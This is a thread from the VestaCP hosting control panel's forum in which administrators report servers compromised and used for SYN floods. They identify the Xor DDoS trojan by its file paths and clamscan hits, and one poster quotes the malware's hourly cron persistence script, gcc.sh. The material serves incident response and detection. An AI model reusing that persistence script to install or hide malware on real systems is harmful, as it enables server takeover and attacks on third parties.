We are happy to announce that Vesta is back under active development as of 25 February 2024. We are working on Vesta 2.0 and expect to release it by the end of 2024. Read more about it: https://vestacp.com/docs/vesta-2-development
Got 10 VestaCP servers exploited
Got 10 VestaCP servers exploited
Hello!
Today I was surprised to discover that 10 of our customers servers were being exploited (attacking a chinese IP). All these servers have nothing in common but the fact they all run VestaCP. None of my non-VestaCP servers were affected.
I would like to ask if anyone was also affected. Any chance there's a VestaCP vulnerability being exploited in the wild?
Thank you in advance
Kindly, Albertus
Today I was surprised to discover that 10 of our customers servers were being exploited (attacking a chinese IP). All these servers have nothing in common but the fact they all run VestaCP. None of my non-VestaCP servers were affected.
I would like to ask if anyone was also affected. Any chance there's a VestaCP vulnerability being exploited in the wild?
Thank you in advance
Kindly, Albertus
-
lukapaunovic
- Posts: 73
- Joined: Sun Dec 03, 2017 6:30 pm
Re: Got 10 VestaCP servers exploited
This happened to my clients.
I have 3 clients from different geographic locations.
all they have in common is that their server got suspended by ovh and that they are using vesta.
They all allegedly did some syn flood to the same IP:
111.231.132.129
Which is crazy.
I have 3 clients from different geographic locations.
all they have in common is that their server got suspended by ovh and that they are using vesta.
They all allegedly did some syn flood to the same IP:
111.231.132.129
Which is crazy.
Re: Got 10 VestaCP servers exploited
Albertus, where are your servers?
OVH ?
OVH ?
-
lukapaunovic
- Posts: 73
- Joined: Sun Dec 03, 2017 6:30 pm
Re: Got 10 VestaCP servers exploited
Interestingly the OVH refuses to provide access via rescue to backup files so i can investigate what happened.
for one server they provided read-only FTP access and i can't read/download/open any of the files.
This is really suspicious to me.
It looks like ovh nodes got hacked
for one server they provided read-only FTP access and i can't read/download/open any of the files.
This is really suspicious to me.
It looks like ovh nodes got hacked
Re: Got 10 VestaCP servers exploited
Albertus, can you tell us in what variant you installed Vesta, default (nginx+apache) or nginx+fpm?
What linux distribution you are using?
What linux distribution you are using?
Re: Got 10 VestaCP servers exploited
Me too. I've created another thread (in russian). But my provider is FastVPS, not OVH.
-
lukapaunovic
- Posts: 73
- Joined: Sun Dec 03, 2017 6:30 pm
Re: Got 10 VestaCP servers exploited
One of the clients VPS at OVh got unlocked.
first they highly resisted even giving rescue access to the files and then they simply unlocked and it didn't say what's the deal.
I am going just to block that IP in firewall. as i found no evidence in logs after server got unlocked it was attacked like they claim
first they highly resisted even giving rescue access to the files and then they simply unlocked and it didn't say what's the deal.
I am going just to block that IP in firewall. as i found no evidence in logs after server got unlocked it was attacked like they claim
-
dmitry-itldc
- Posts: 1
- Joined: Sat Apr 07, 2018 4:41 pm
- Os: CentOS 6x
- Web: nginx + php-fpm
Re: Got 10 VestaCP servers exploited
The same thing - some VDS's was exploited, all has Vesta installed on Centos 7, as far as I see.
Most of systems was compromised few days ago (4-5 april). Malicious software, used for attacks - a variant of Linux/Xorddos.C (https://en.wikipedia.org/wiki/Xor_DDoS), you can find files like gcc.sh, /tmp/update, /usr/lib/libudev.so.
Clamscan can detect this malware, for example:
# clamscan -r -i /usr
/usr/bin/tcfndpnals: Unix.Trojan.DDoS_XOR-1 FOUND
/usr/lib/libudev.so: Unix.Trojan.DDoS_XOR-1 FOUND
We still investigating how systems was compromised.
Most of systems was compromised few days ago (4-5 april). Malicious software, used for attacks - a variant of Linux/Xorddos.C (https://en.wikipedia.org/wiki/Xor_DDoS), you can find files like gcc.sh, /tmp/update, /usr/lib/libudev.so.
Clamscan can detect this malware, for example:
# clamscan -r -i /usr
/usr/bin/tcfndpnals: Unix.Trojan.DDoS_XOR-1 FOUND
/usr/lib/libudev.so: Unix.Trojan.DDoS_XOR-1 FOUND
We still investigating how systems was compromised.
Re: Got 10 VestaCP servers exploited
Found in /etc/cron.hourly/gcc.sh, modified 04.04.2018 16:25:00
I did not think that the infection was a few days ago. Analyzed all the logs for today - nothing suspicious, no authorization in Vesta and so on.
Code: Select all
#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
-
lukapaunovic
- Posts: 73
- Joined: Sun Dec 03, 2017 6:30 pm
Re: Got 10 VestaCP servers exploited
i also see gcc.sh present and unix tool....
:(
:(